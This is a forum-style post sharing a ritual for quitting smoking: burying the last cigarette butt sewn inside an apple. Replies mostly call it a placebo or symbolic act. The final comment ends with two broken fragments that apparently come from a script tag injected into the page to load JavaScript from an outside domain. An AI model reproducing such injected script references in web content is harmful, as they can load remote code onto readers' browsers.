Quit Smoking

Hi :) I did this to help me quit smoking, and I thought it could help someone quit too :)

1)Smoke your last cigarette. (keep the butt)

2) Get an Apple and cut it in half, and make a pit in the core.

4) Put the butt in the core, but the Apple back together, And sew closed with white thread

5) Bury it :)

oke i dont smoke or drink and i never will cus to me thats bleh.. grose.. lol but question.. my mom smokes but she doesnt want.. but if she did want i think she would get pissed off and have pms if she just smokes last cigarette and does this.. how would it be this easy O.o? lol

This is simply a placebo effect so you really could do this with any object as it's more a mental reprogramming than anything

I mean you litterally could go bury a cigarette and say to yourself that's a symbolic way of putting it in your past

Not trying to say this doesn't work but it's just a placebo effect because you think this is some huge thing that is stopping you but in reality you've just finally made the choice to quit

It may just be a placebo, but it helped, it's not a spell, it was, as you said, a symbolic way of putting it in my past, and it helped. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
